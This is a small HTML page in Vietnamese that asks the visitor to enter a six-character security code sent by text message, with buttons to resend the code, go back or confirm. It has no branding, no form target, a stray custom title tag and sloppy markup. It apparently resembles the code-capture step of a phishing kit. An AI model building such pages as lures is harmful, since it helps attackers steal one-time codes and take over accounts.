<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="css/Xacminh.css" rel="stylesheet" />
    <title><fix24h class="biz"></fix24h></title>
</head>
<body>
        <div class="container">
          <h1>NHẬP MÃ BẢO MẬT</h1>
          <p>Vui lòng kiểm tra điện thoại để xem tin nhắn văn bản có mã.Mã của bạn có 6 ký tự.</p>
          <hr>
          <div class="card-text">
            <div class="form-group">
                <label for="Nhập lại"><b>Vui lòng kiểm tra điện thoại để xem tin nhắn văn bản có mã.</b></label>
                <input type="text" placeholder="Mã xác nhận" name="Nhập lại" id="Nhập lại" required>
            </div>
               <button type="submit" class="Gửi lại mã">Gửi lại mã</button>
               <button type="submit" class="Xác nhận">Trở lại</button>
               <button type="submit" class="Gửi lại mã">Xác nhận</button>

      
    
        </div>
      </form>
</body>
</html>